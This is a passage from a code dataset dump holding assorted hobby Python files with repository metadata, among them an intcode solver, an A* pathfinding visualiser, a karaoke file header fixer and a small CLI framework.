test_2_(self):\r\n print(\"\\nRunning test2: insert\")\r\n self.tree.insert(11)\r\n self.assertTrue(self.tree.find(11))\r\n def test_3_(self):\r\n print(\"\\nRunning test3: pre-order traversal (print)\")\r\n capturedOutput = io.StringIO() \r\n sys.stdout = capturedOutput \r\n self.tree.traversePreOrder() \r\n sys.stdout = sys.__stdout__ \r\n result = capturedOutput.getvalue()\r\n self.assertEqual(result,'70 31 14 11 23 93 73 94 ')\r\n def test_4_(self):\r\n print(\"\\nRunning test4: delete\")\r\n self.tree.delete(14)\r\n self.assertFalse(self.tree.find(14))\r\n def test_5_(self):\r\n print(\"\\nRunning test5: not empty\")\r\n self.assertTrue(self.tree.isEmpty())\r\n def test_6_(self):\r\n print(\"\\nRunning test6: empty\")\r\n self.tree.delete(70)\r\n self.assertTrue(self.tree.isEmpty())\r\nif __name__ == '__main__':\r\n unittest.main()","repo_name":"Hajime711/Morse_conversion","sub_path":"test_binary_tree.py","file_name":"test_binary_tree.py","file_ext":"py","file_size_in_byte":1391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"979473982","text":"\"\"\"\nFile: counting.py\nPrints the the number of iterations for problem sizes \nthat double, using a nested loop.\n\"\"\"\n\nproblemSize = 1000\nprint(\"%12s%15s\" % (\"Problem Size\", \"Iterations\"))\nfor count in range(5):\n number = 0\n\n # The start of the algorithm\n work = 1\n for j in range(problemSize):\n for k in range(problemSize):\n number += 1\n work += 1\n work -= 1\n # The end of the algorithm\n \n print(\"%12d%15d\" % (problemSize, number))\n problemSize *= 2\n","repo_name":"bat67/Fundamentals-of-Python-Data-Structures","sub_path":"Ch_3/counting.py","file_name":"counting.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"75"} +{"seq_id":"22382214124","text":"'''\nHelp script for saving and loading arrays\n'''\n\n\nimport numpy as np\n\n\ndef SaveArray(data, filename):\n # Write the array to disk\n with open(filename, 'w+') as outfile:\n\n outfile.write('# Array shape ( w0, tSteps, dimensions): {0}\\n'.format(data.shape))\n\n # Iterating through a ndimensional array produces slices along\n # the last axis. This is equivalent to data[i,:,:] in this case\n for data_slice in data:\n\n # The formatting string indicates that out\n # the values in left-justified columns 7 characters in width\n # with 2 decimal places.\n np.savetxt(outfile, data_slice, fmt='%-10.4f')\n\n # Writing out a break to indicate different slices...\n outfile.write('# New slice\\n')\n print(\"Data saved to \", filename)\n\n\ndef LoadArray(filename, shape):\n # shape is a tuple of the dimensions of the output array\n # Read the array from disk\n if not isinstance(filename, str):\n filename = str(filename)\n new_data = np.loadtxt(filename)\n\n # Note that this returned a 2D array!\n\n new_data = new_data.reshape(shape)\n return new_data\n","repo_name":"ctvandekamp/adaptive-networks","sub_path":"Python files/ODEs/Bifurcation diagram mean field Chen/saveloadarray.py","file_name":"saveloadarray.py","file_ext":"py","file_size_in_byte":1157,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"3952160783","text":"#!/usr/bin/env python3\n\nimport itertools\n\ndebug = 1\nif (debug):\n import time\n start = time.perf_counter()\n\nwith open(\"challenge-07-12-2019.txt\",\"r\") as f:\n puzzle_input = [x.strip() for x in f]\n\ndef part1(input):\n program_data = [int(x) for x in input[0].split(',')]\n\n def intcode(data, x, y):\n program_input = [x, y]\n program_output = []\n next_op = 0\n i = 0\n \n while (next_op != 99):\n ap, bp = 0, 0\n next_op = data[i]\n \n if (len(str(next_op)) >= 3):\n ap = int(str(next_op)[-3])\n if (len(str(next_op)) >= 4):\n bp = int(str(next_op)[-4])\n next_op = int(str(next_op)[-1])\n \n a = data[i + 1]\n if (ap == 0 and next_op != 3 and len(data) > a):\n a = data[a]\n if (len(data) > i + 2):\n b = data[i + 2]\n if (bp == 0 and len(data) > b):\n b = data[b]\n if (len(data) > i + 3):\n c = data[i + 3]\n \n if (next_op == 1):\n data[c] = a + b\n i += 4\n elif (next_op == 2):\n data[c] = a * b\n i += 4\n elif (next_op == 3):\n data[a] = program_input.pop(0)\n i += 2\n elif (next_op == 4):\n program_output.append(a)\n i += 2\n elif (next_op == 5):\n if (a):\n i = b\n else :\n i += 3\n elif (next_op == 6):\n if (a == 0):\n i = b\n else :\n i += 3\n elif (next_op == 7):\n if (a < b):\n data[c] = 1\n else :\n data[c] = 0\n i += 4\n elif (next_op == 8):\n if (a == b):\n data[c] = 1\n else :\n data[c] = 0\n i += 4\n \n return(program_output)\n\n highest = 0\n allinputs = list(itertools.permutations([0, 1, 2, 3, 4], 5))\n for x in allinputs:\n init = 0\n output = 0\n #print(x)\n for y in x:\n if (output != 0):\n init = output[0]\n output = intcode(program_data.copy(), y, init)\n #print(y, init, output)\n if (output[0] > highest or highest == 0):\n highest = output[0]\n \n return(highest)\n\ndef part2(input):\n # Will come back to part 2 later, moving on for now!\n return(1)\n\nprint(\"PartI:\", part1(puzzle_input))\nprint(\"PartII:\",part2(puzzle_input))\n\nif (debug):\n end = time.perf_counter()\n print(\"Runtime: {:5.3f}\".format(end-start))\n \n","repo_name":"jonsmith1982/AdventOfCode2019","sub_path":"challenge-07-12-2019.py","file_name":"challenge-07-12-2019.py","file_ext":"py","file_size_in_byte":2302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"37079464900","text":"from python_helper import Constant as c\nfrom python_helper import log\nfrom FrameworkModel import Model\nimport SqlAlchemyProxy, GitCommitter\nimport Api, Session\nimport FrameworkConstant\nfrom LoadSessionAnnotation import LoadSession\nfrom SessionMethodAnnotation import SessionMethod\nfrom PythonFrameworkApplicationScript import *\nimport FrameworkNewSession, FrameworkOpenSession, FrameworkPrintSession, FrameworkLoadApiClassSet, FrameworkCloseSession, FrameworkAddToSession\nimport FrameworkSessionHelper\n\nApi = Api.Api\nSession = Session.Session\nGitCommitter = GitCommitter.GitCommitter\nSqlAlchemyProxy = SqlAlchemyProxy.SqlAlchemyProxy\nFrameworkStatus = FrameworkConstant.Status\n\nclass PythonFramework:\n\n UNEXPECTED_KEYWORD_ARGUMMENT = '__init__() got an unexpected keyword argument'\n MISSING_REQUIRED_ARGUMENT = '__init__() missing 1 required positional argument:'\n\n API_KEY_FRAMEWORK = 'framework'\n API_KEY_GIT_COMMITTER = 'git-committer'\n\n _0_API_KEY = 0\n _1_COMMAND = 1\n _0_ARGUMENT = 2\n _1_ARGUMENT = 3\n _2_ARGUMENT = 4\n _3_ARGUMENT = 5\n _4_ARGUMENT = 6\n\n COMMAND_NEW_SESSION = 'new-session'\n COMMAND_OPEN_SESSION = 'open-session'\n COMMAND_ADD_TO_SESSION = 'add-to-session'\n COMMAND_REMOVE_FROM_SESSION = 'remove-from-session'\n COMMAND_SAVE_SESSION = 'save-session'\n COMMAND_PRINT_SESSION = 'print-session'\n COMMAND_SESSION_COMMAND_LIST = 'session-command-list'\n COMMAND_CLOSE_SESSION = 'close-session'\n\n COMMAND_LIST_ALL_SESSION = 'list-all-session'\n\n COMMAND_RUN_FLASK = 'run-flask'\n\n COMMAND_COMMAND_LIST = 'command-list'\n\n COMMAND_UPDATE_REQUIREMENTS = 'update-requirements'\n\n commandList = {\n COMMAND_NEW_SESSION : [],\n COMMAND_OPEN_SESSION : ['sessionKey'],\n COMMAND_ADD_TO_SESSION : ['sessionKey','apiKey','apiProjectName','apiClassName','gitUrl'],\n COMMAND_REMOVE_FROM_SESSION : [],\n COMMAND_SAVE_SESSION : ['sessionKey'],\n COMMAND_PRINT_SESSION : [],\n COMMAND_SESSION_COMMAND_LIST : [],\n COMMAND_CLOSE_SESSION : [],\n COMMAND_LIST_ALL_SESSION : [],\n\n COMMAND_RUN_FLASK : []\n }\n\n KW_GIT_COMMITTER = API_KEY_GIT_COMMITTER\n\n @SessionMethod\n def handleCommandList(self,commandList):\n globals = self.globals\n log.debug(self.__class__,f'{self.__class__.__name__}.commandList = {commandList}')\n log.debug(self.__class__,f'session = {self.session}')\n commandListReturn = self.apiSet[commandList[self._0_API_KEY]][commandList[self._1_COMMAND]](commandList)\n self.repository.close()\n return commandListReturn\n\n @SessionMethod\n def handleSystemArgumentValue(self,commandList,externalFunction):\n globals = self.globals\n try :\n if self.apiClassSet :\n apiClass = self.apiClassSet.get(commandList[self._0_API_KEY])\n if apiClass and apiClass in [self.__class__, GitCommitter] :\n log.success(self.__class__, f'running {commandList} command list')\n return self.handleCommandList(commandList)\n elif apiClass :\n globals.overrideApiTree(apiClass.__name__,package=apiClass.__name__)\n api = apiClass(*self.args,**self.kwargs)\n log.success(self.__class__, f'running {apiClass.__name__}({self.args}, {self.kwargs})')\n return api.handleCommandList(commandList)\n else :\n log.failure(self.__class__,f'''couldn't instance api class of {commandList[self._0_API_KEY]}''', c.NOTHING)\n else :\n log.debug(self.__class__,f'{commandList[self._0_API_KEY]} key called and running all alone')\n externalFunctonReturn = externalFunction(commandList,globals,**self.kwargs)\n self.repository.close()\n return externalFunctonReturn\n except Exception as exception :\n errorMessage = str(exception)\n if self.MISSING_REQUIRED_ARGUMENT in errorMessage :\n newArgs = (*self.args,self.globals)\n try :\n api = apiClass(*newArgs,**self.kwargs)\n log.success(self.__class__, f'running {apiClass.__name__}({self.args}, {self.kwargs})')\n return api.handleCommandList(commandList)\n except Exception as exception :\n secondErrorMessage = f', after first try: {str(exception)}'\n newArgs = *self.args,self.session,self.globals\n try :\n api = apiClass(*newArgs,**self.kwargs)\n log.success(self.__class__, f'running {apiClass.__name__}({self.args}, {self.kwargs})')\n return api.handleCommandList(commandList)\n except Exception as exception :\n thirdErrorMessage = f', after second try: {str(exception)}'\n else :\n secondErrorMessage = ''\n thirdErrorMessage = ''\n globals.error(self.__class__, f'error processing \"{commandList[self._0_API_KEY]}\" call{secondErrorMessage}{thirdErrorMessage}', errorMessage)\n self.repository.close()\n\n def __init__(self,*args,**kwargs):\n self.globals = args[-1]\n externalFunction = args[-2]\n self.args = args[:-2]\n self.kwargs = kwargs\n self.name = self.globals.getApiSetting('api.name')\n self.repository = SqlAlchemyProxy(model=Model,globals=self.globals)\n self.importApplicationScriptPath = f'{self.globals.apiPath}{self.globals.baseApiPath}runtime{c.BACK_SLASH}{IMPORT_SCRITP_FILE_NAME}.{self.globals.PYTHON_EXTENSION}'\n\n self.apiSet = {}\n self.apiSet[self.API_KEY_FRAMEWORK] = {\n self.COMMAND_NEW_SESSION : self.newSession,\n self.COMMAND_ADD_TO_SESSION : self.addToSession,\n self.COMMAND_REMOVE_FROM_SESSION : self.removeFromSession,\n self.COMMAND_SAVE_SESSION : self.saveSession,\n self.COMMAND_OPEN_SESSION : self.openSession,\n self.COMMAND_PRINT_SESSION : self.printSession,\n self.COMMAND_CLOSE_SESSION : self.closeSession,\n\n self.COMMAND_LIST_ALL_SESSION : self.listAllSession,\n\n self.COMMAND_SESSION_COMMAND_LIST : self.sessionCommandList,\n self.COMMAND_COMMAND_LIST : self.printCommandList,\n\n self.COMMAND_RUN_FLASK : self.runFlask,\n\n self.COMMAND_UPDATE_REQUIREMENTS : self.updateRequirements\n }\n self.apiClassSet = self.loadApiClassSet()\n self.gitCommitter = GitCommitter(self.session,self.globals)\n self.apiSet[self.API_KEY_GIT_COMMITTER] = self.gitCommitter.commandSet\n\n @LoadSession\n def loadApiClassSet(self):\n return FrameworkLoadApiClassSet.loadApiClassSet(self)\n\n @SessionMethod\n def updateRequirements(self,commandList):\n self.globals.updateDependencyStatus = True\n self.globals.updateDependencies()\n self.globals.updateDependencyStatus = False\n\n @SessionMethod\n def runFlask(self,commandList):\n from PythonFrameworkFlask import app\n flaskReturn = app.run()\n return flaskReturn\n\n @SessionMethod\n def newSession(self,commandList):\n return FrameworkNewSession.newSession(self,commandList)\n\n @SessionMethod\n def addToSession(self,commandList):\n return FrameworkAddToSession.addToSession(self,commandList)\n\n @SessionMethod\n def removeFromSession(self,commandList):\n log.debug(self.__class__,f'{self.__class__.__name__}.removeFromSession({commandList})')\n pass\n\n @SessionMethod\n def saveSession(self,commandList):\n log.debug(self.__class__,f'{self.__class__.__name__}.saveSession({commandList})')\n pass\n\n @SessionMethod\n def listAllSession(self,commandList):\n self.log.debug(self.__class__,f'{self.__class__.__name__}.listAllSession({commandList})')\n pass\n\n @SessionMethod\n def openSession(self,commandList):\n return FrameworkOpenSession.openSession(self,commandList)\n\n @SessionMethod\n def printSession(self,commandList):\n return FrameworkPrintSession.printSession(self,commandList)\n\n @SessionMethod\n def closeSession(self,commandList):\n return FrameworkCloseSession.closeSession(self,commandList)\n\n @SessionMethod\n def sessionCommandList(self,commandList):\n self.globals.printTree(self.apiSet,f'{c.TAB}Command list: ',depth=2)\n\n @SessionMethod\n def printCommandList(self,commandList):\n self.globals.printTree(self.commandList,f'{self.__class__.__name__} commandList',depth=1)\n\n def printSuccess(self,message):\n self.printMessage(message,c.SUCCESS)\n\n def printError(self,message):\n self.printMessage(message,c.ERROR)\n\n def printWarning(self,message):\n self.printMessage(message,c.WARNING)\n\n def printMessage(self,message,level):\n print(f'{c.TAB}{level}{message}')\n\n\ndef run(*args,**kwargs):\n '''...*args, externalFunction, globals, **kwargs'''\n import sys\n externalFunction = args[-2]\n globals = args[-1]\n commandList = sys.argv.copy()[1:]\n if len(commandList) > 0 :\n framework = PythonFramework(*args,**kwargs)\n sys.argv = []\n return framework.handleSystemArgumentValue(commandList,externalFunction)\n else :\n log.debug(PythonFramework,f'''Command list not found. Proceeding by default api launch method''')\n return externalFunction(commandList,globals,**kwargs)\n","repo_name":"SamuelJansen/PythonFramework","sub_path":"api/src/service/PythonFramework.py","file_name":"PythonFramework.py","file_ext":"py","file_size_in_byte":9540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"21509050950","text":"# Enter in folder location and regex to be searched.\n# Program will print out the file path and text in file.\nimport glob\nimport re\n\ndef regexSearch (folderLocation, searchRegex):\n txtFiles = glob.glob(folderLocation + '/*.txt')\n for file in txtFiles:\n fileToSearch = open(file).read()\n if searchRegex.search(fileToSearch):\n print(file)\n print(fileToSearch)\n \n \n \nregexSearch('folderlocation', re.compile(r'regex'))","repo_name":"tsmith2077/Reading-and-Writing-Examples","sub_path":"regexSearch.py","file_name":"regexSearch.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"2168184909","text":"import numpy as np\n\nfin_a=np.load(\"fin/auc.npz\")[\"auc\"]\nfin_o=np.load(\"fin/oauc.npz\")[\"auc\"]\nmfin_a=np.load(\"mfin/auc.npz\")[\"auc\"]\nmfin_o=np.load(\"mfin/oauc.npz\")[\"auc\"]\nraw_a=np.load(\"raw/auc.npz\")[\"auc\"]\nraw_o=np.load(\"raw/oauc.npz\")[\"auc\"]\n\nae=np.load(\"ae/auc.npz\")\n\nnp.savez_compressed(\"result\",fina=fin_a,fino=fin_o,mfina=mfin_a,mfino=mfin_o,rawa=raw_a,rawo=raw_o,ae_o=ae[\"oauc\"],ae_a=ae[\"auc\"])\n\n\n\n\n\n","repo_name":"psorus/x7","sub_path":"rw/summarize.py","file_name":"summarize.py","file_ext":"py","file_size_in_byte":406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"7569113114","text":"#!/usr/bin/env python\n\nimport dendropy\nimport os\nimport sys\n\nID = 'index' \nnumber = range(45)\nnumber = number[1:45]\n\nlociFile = 'loci'\n\nlociFile = open(lociFile, 'r')\n\nfor line in lociFile:\n\n\tlocus = line.split('\\t')\n\tlocusOutFile = locus[1] + '_noHistoric.fa'\n\tlocusOutFile = open(locusOutFile, 'w')\n\n\tlocusInFile = locus[1] +'.fa'\n\n\tseqFile = dendropy.DnaCharacterMatrix.get_from_path(locusInFile, \"fasta\")\n\n\tfor num in number:\n\t\tseqFile\n","repo_name":"markphuong/Target_Enrichment","sub_path":"removeHistoric.py","file_name":"removeHistoric.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"75"} +{"seq_id":"36541637135","text":"#wap which accept number from user and convert decimal to hexdecimal and display on console\n\n\ndef hex(no):\n\tbit = 0;\n\tarr = ['A','B','C','D','E','F']\n\tarr_list =list();\n\t\n\twhile( no != 0):\n\t\tbit = int(no%16);\n\t\tif bit <= 9:\n\t\t\tarr_list.append(bit)\n\t\telse:\n\t\t\tarr_list.append(arr[bit-10]);\n\t\tno = int(no/16);\n\t\n\tsize = len(arr_list);\n\tsize = size -1;\n\twhile size >= 0:\n\t\tprint(arr_list[size], end=\" \");\n\t\tsize = size - 1;\n\t\t\n\t\n\ndef main():\n\t\n\tival = int(input(\"Enter number: \"));\n\t\n\thex(ival);\n\tprint();\n\nif __name__ == \"__main__\":\n\tmain();\n","repo_name":"DilipBDabahde/PythonExample","sub_path":"RP/decimal_to_hex.py","file_name":"decimal_to_hex.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"37805495904","text":"from tornado import web\n\n\ndef make_status_web_handler(shared_status, path, port, address=''):\n app = web.Application([\n (path, _StatusHandler, dict(shared_status=shared_status))\n ], debug=False)\n\n app.listen(port, address)\n return app\n\n\nclass _StatusHandler(web.RequestHandler):\n TASK_NAME = 'status_handler'\n\n def initialize(self, shared_status):\n self.shared_status = shared_status\n self.status = shared_status.register(_StatusHandler.TASK_NAME)\n self.requests_count = 0\n\n def get(self):\n self._inc_count()\n self.write(self.shared_status.as_dict())\n self._drop_count()\n\n def _inc_count(self):\n self.requests_count += 1\n self._mark_ok()\n\n def _drop_count(self):\n self.requests_count -= 1\n if self.requests_count <= 0:\n self.requests_count = 0\n self.status.mark_ok('idle')\n else:\n self._mark_ok()\n\n def _mark_ok(self):\n self.status.mark_ok(\n 'processing {} request(s)'.format(self.requests_count))\n","repo_name":"karitra/mokak","sub_path":"mokak/web.py","file_name":"web.py","file_ext":"py","file_size_in_byte":1063,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"23884070706","text":"#thanks to ryanbevins and SutandoTsukai181 for research\r\nimport sys\r\nimport os\r\n\r\nglobal MODIFIED_COUNT\r\ninput_files = sys.argv[1:]\r\nENDIANNESS = 'little'\r\nMODIFIED_COUNT = 0\r\n\r\n# checks if there are any files\r\nif input_files == []:\r\n input(\"No files detected. You need to drag and drop the file(s).\\nPress any key to continue.\")\r\n quit()\r\n\r\n# gets max possible score\r\ndef get_score(binary_data, n_notes, header_size):\r\n i = 1\r\n score = 0\r\n offset = header_size + 20\r\n regular_count = 0\r\n hold_count = 0\r\n rapid_count = 0\r\n while i <= n_notes:\r\n note_type = int.from_bytes(binary_data[offset:offset + 4], ENDIANNESS)\r\n if note_type == 0: # regular\r\n score += 10 # regular note is 10pt (Great)\r\n regular_count += 1\r\n elif note_type == 1: # hold\r\n score += 30 # hold note is 30pt (Great)\r\n hold_count += 1\r\n elif note_type == 2: # rapid\r\n score += 30 # rapid note is 30pt (Great)\r\n rapid_count += 1\r\n if i > 20: # if heat mode is available (triggers at 20x combo)\r\n score += 5 # +5 points per note during heat mode\r\n\r\n offset += 32\r\n i += 1\r\n print(f'{regular_count} regular notes\\n{hold_count} hold notes\\n{rapid_count} rapid notes')\r\n return score\r\n\r\n\r\ndef save_file(input_file, binary_data):\r\n with open(f'{input_file[:-4]}-new.kbd', 'wb') as f:\r\n f.write(binary_data)\r\n print(f'{os.path.basename(input_file)[:-4]}-new.kbd saved.')\r\n\r\n# loads the file\r\ndef magic_check(binary_data, input_file):\r\n try:\r\n magic = binary_data[0x0:0x4].decode()\r\n except(UnicodeDecodeError):\r\n print(f\"Can't load magic for {os.path.basename(input_file)}, skipping file.\")\r\n return False\r\n if magic == \"NTBK\":\r\n ver = int.from_bytes(binary_data[0x8:0xC], ENDIANNESS)\r\n if ver in [1, 2]:\r\n return True\r\n else:\r\n print(f'Unknown version {ver} found.\\nSkipping {os.path.basename(input_file)}')\r\n return False\r\n else:\r\n print(f'Magic does not match, most likely not a valid karaoke file.\\nSkipping {os.path.basename(input_file)}.')\r\n return False\r\n\r\ndef load_file(input_file):\r\n with open(input_file, 'rb') as binary_file:\r\n binary_data = bytearray(binary_file.read())\r\n num_bytes = binary_file.tell()\r\n if magic_check(binary_data, input_file):\r\n update_values(binary_data, num_bytes, input_file)\r\n\r\n\r\ndef update_values(binary_data, num_bytes, input_file):\r\n global MODIFIED_COUNT\r\n # load values from header\r\n print('Loading data from header...')\r\n ver = int.from_bytes(binary_data[0x8:0xC], ENDIANNESS)\r\n size = int.from_bytes(binary_data[0xC:0x10], ENDIANNESS)\r\n n_notes = int.from_bytes(binary_data[0x10:0x14], ENDIANNESS)\r\n max_score = int.from_bytes(binary_data[0x14:0x18], ENDIANNESS)\r\n \r\n\r\n print(f'Version: {ver}')\r\n print(f'Size w/o header: {size}')\r\n print(f'Number of notes: {n_notes}')\r\n print(f'Max score: {max_score}')\r\n\r\n if ver == 1:\r\n header_size = 24\r\n elif ver == 2:\r\n header_size = 28\r\n\r\n # calculates header size\r\n actual_size = num_bytes - header_size\r\n \r\n # calculates number of notes\r\n # 32 bytes is the size of 1 note info\r\n actual_n_notes = int(actual_size / 32)\r\n # calculates max score\r\n actual_max_score = get_score(binary_data, actual_n_notes, header_size)\r\n\r\n # update values\r\n file_modified = False\r\n if size != actual_size:\r\n binary_data[0xC:0x10] = actual_size.to_bytes(4, byteorder=ENDIANNESS)\r\n file_modified = True\r\n print(f'Updated size value. Old: {size} New: {actual_size}')\r\n if n_notes != actual_n_notes:\r\n binary_data[0x10:0x14] = actual_n_notes.to_bytes(\r\n 4, byteorder=ENDIANNESS)\r\n file_modified = True\r\n print(\r\n f'Updated note count. Old: {n_notes} New: {actual_n_notes}')\r\n if max_score != actual_max_score:\r\n binary_data[0x14:0x18] = actual_max_score.to_bytes(\r\n 4, byteorder=ENDIANNESS)\r\n file_modified = True\r\n print(f'Updated max score. Old: {max_score} New: {actual_max_score}')\r\n\r\n # save file\r\n if file_modified:\r\n save_file(input_file, binary_data)\r\n MODIFIED_COUNT += 1\r\n else:\r\n print(f'No values were updated in {os.path.basename(input_file)}.')\r\n\r\n\r\n# loads each file\r\nfor file in input_files:\r\n load_file(file)\r\n\r\ninput(f\"{MODIFIED_COUNT} file(s) were updated.\\nPress enter to continue...\")\r\n","repo_name":"Timo654/de_karaFixer","sub_path":"de_karaFixer.py","file_name":"de_karaFixer.py","file_ext":"py","file_size_in_byte":4571,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"40754419234","text":"import pygame\nimport math\nfrom queue import PriorityQueue\n\n#set up grid display\nWIDTH = 800\nWIN = pygame.display.set_mode((WIDTH, WIDTH))\npygame.display.set_caption(\"A* Algorithm\")\n\nRED = (255, 0, 0)\nGREEN = (0, 255, 0)\nYELLOW = (251, 255, 135)\nLIGHT_BLUE = (189, 225, 255)\nDARK_BLUE = (19, 84, 138)\nWHITE = (255, 255, 255)\nBLACK = (50, 50, 50)\nGREY = (128, 128, 128)\n\n\nclass Node:\n def __init__(self, row, col, width, total_rows):\n self.row = row\n self.col = col\n self.x = row * width\n self.y = col * width\n self.color = WHITE\n self.neighbors = []\n self.width = width\n self.total_rows = total_rows\n\n def get_pos(self):\n return self.row, self.col\n\n #closed: we have already looked at the node\n def is_closed(self):\n return self.color == LIGHT_BLUE\n\n def is_open(self):\n return self.color == DARK_BLUE\n\n def is_barrier(self):\n return self.color == BLACK\n\n def is_start(self):\n return self.color == GREEN\n\n def is_end(self):\n return self.color == RED\n\n def reset(self):\n self.color = WHITE\n\n def make_closed(self):\n self.color = LIGHT_BLUE\n\n def make_open(self):\n self.color = DARK_BLUE\n\n def make_barrier(self):\n self.color = BLACK\n\n def make_start(self):\n self.color = GREEN\n\n def make_end(self):\n self.color = RED\n\n def make_path(self):\n self.color = YELLOW\n\n def draw(self, win):\n pygame.draw.rect(win, self.color, (self.x, self.y, self.width, self.width))\n\n def update_neighbors(self, grid):\n # self.neighbors = [] # need?\n if self.row < self.total_rows - 1 and not grid[self.row + 1][self.col].is_barrier(): # down neighbor\n self.neighbors.append(grid[self.row + 1][self.col])\n\n if self.row > 0 and not grid[self.row - 1][self.col].is_barrier(): # up neighbor\n self.neighbors.append(grid[self.row - 1][self.col])\n\n if self.col > 0 and not grid[self.row][self.col - 1].is_barrier(): # left neighbor\n self.neighbors.append(grid[self.row][self.col - 1])\n\n if self.col < self.total_rows - 1 and not grid[self.row][self.col + 1].is_barrier(): # right neighbor\n self.neighbors.append(grid[self.row][self.col + 1])\n\n\n # compares 2 nodes together\n def less_than(self, other):\n return False\n\n# heuristic using Manhattan Distance (\"L distance\")\n# points p1, p2 of form (x, y)\ndef h(p1, p2):\n x1, y1 = p1\n x2, y2 = p2\n return abs(x1 - x2) + abs(y1 - y2)\n\ndef reconstruct_path(came_from, current, draw):\n while current in came_from:\n current = came_from[current]\n current.make_path()\n draw()\n\ndef algorithm(draw, grid, start, end):\n count = 0\n open_set = PriorityQueue() # PriorityQueue helps get the smallest element each time\n open_set.put((0, count, start)) # add start node to open set\n came_from = {}\n # g_score is current shortest distance to get from start to current\n g_score = {node: float(\"inf\") for row in grid for node in row}\n g_score[start] = 0\n # f_score predicted distance of current node to end node \n f_score = {node: float(\"inf\") for row in grid for node in row}\n f_score[start] = h(start.get_pos(), end.get_pos())\n\n open_set_hash = {start} # tells us if node is in the queue or not\n\n while not open_set.empty(): # if empty, we've considered all nodes\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n\n current = open_set.get()[2] # pop the node from the open set\n open_set_hash.remove(current) # also remove it from the hash\n\n if current == end:\n reconstruct_path(came_from, end, draw)\n start.make_start()\n end.make_end()\n return True\n\n for neighbor in current.neighbors:\n temp_g_score = g_score[current] + 1\n\n if temp_g_score < g_score[neighbor]:\n came_from[neighbor] = current\n g_score[neighbor] = temp_g_score\n f_score[neighbor] = temp_g_score + h(neighbor.get_pos(), end.get_pos())\n if neighbor not in open_set_hash:\n count += 1\n open_set.put((f_score[neighbor], count, neighbor))\n open_set_hash.add(neighbor)\n neighbor.make_open()\n\n draw()\n if current != start:\n current.make_closed()\n\n\n# creates a 2D array of nodes\ndef make_grid(rows, grid_width):\n grid = []\n node_width = grid_width // rows #calculate width of a square by dividing width of entire grid by number of rows \n for i in range(rows):\n grid.append([])\n for j in range(rows):\n node = Node(i, j, node_width, rows)\n grid[i].append(node)\n return grid\n\ndef draw_grid_lines(win, rows, grid_width):\n node_width = grid_width // rows\n for i in range(rows):\n # draws horizontal lines at each row\n # pygame.draw.line(surface, color, start_pos, end_pos)\n pygame.draw.line(win, GREY, (0, i * node_width), (grid_width, i * node_width))\n for j in range(rows):\n # draws vertical lines at each column\n pygame.draw.line(win, GREY, (j * node_width, 0), (j * node_width, grid_width))\n\ndef draw(win, grid, rows, grid_width):\n win.fill(WHITE) # fills entire screen with a color every frame\n\n for row in grid:\n for node in row:\n node.draw(win)\n\n draw_grid_lines(win, rows, grid_width)\n pygame.display.update()\n\ndef get_clicked_pos(pos, rows, width):\n\tgap = width // rows\n\ty, x = pos\n\trow = y // gap\n\tcol = x // gap\n\treturn row, col\n \n\ndef main(win, width):\n ROWS = 50\n grid = make_grid(ROWS, width)\n\n start = None\n end = None\n run = True\n started = False\n\n while run:\n draw(win, grid, ROWS, width)\n # checks all events in pygame\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n run == False\n pygame.quit()\n\n # if the mouse button was clicked (left=0, middle=1, right=2)\n if pygame.mouse.get_pressed()[0]:\n pos = pygame.mouse.get_pos()\n row, col = get_clicked_pos(pos, ROWS, width)\n node = grid[row][col]\n if not start and node != end: # color node start color is there is no start\n start = node\n start.make_start()\n elif not end and node != start: # color node end color is there is no end\n end = node\n end.make_end()\n elif node != end and node != start:\n node.make_barrier()\n\n elif pygame.mouse.get_pressed()[2]:\n pos = pygame.mouse.get_pos()\n row, col = get_clicked_pos(pos, ROWS, width)\n node = grid[row][col]\n node.reset()\n if node == start:\n start = None\n elif node == end:\n end = None\n\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_SPACE and start and end:\n for row in grid:\n for node in row:\n node.update_neighbors(grid)\n algorithm(lambda: draw(win, grid, ROWS, width), grid, start, end)\n\n if event.key == pygame.K_c:\n start = None\n end = None\n grid = make_grid(ROWS, width)\n\n pygame.quit()\n\nmain(WIN, WIDTH)","repo_name":"ShayMa3/a_star-path-finding-algorithm","sub_path":"a_star.py","file_name":"a_star.py","file_ext":"py","file_size_in_byte":7685,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"27674716563","text":"#----------------------------------------------------------------------------#\r\n# Imports\r\n#----------------------------------------------------------------------------#\r\n\r\nimport json\r\nimport dateutil.parser\r\nimport babel\r\nfrom flask import Flask, render_template, request, Response, flash, redirect, url_for, jsonify\r\nfrom flask_migrate import Migrate\r\nfrom flask_moment import Moment\r\nfrom flask_sqlalchemy import SQLAlchemy\r\nimport logging\r\nfrom logging import Formatter, FileHandler\r\nfrom flask_wtf import Form\r\nfrom forms import *\r\n#----------------------------------------------------------------------------#\r\n# App Config.\r\n#----------------------------------------------------------------------------#\r\n\r\napp = Flask(__name__)\r\nmoment = Moment(app)\r\napp.config.from_object('config')\r\ndb = SQLAlchemy(app)\r\nmigrate = Migrate(app, db)\r\n\r\n# TODO: connect to a local postgresql database\r\napp.config['SQLALCHEMY_DATABASE_URI'] = 'postgresql://postgres: 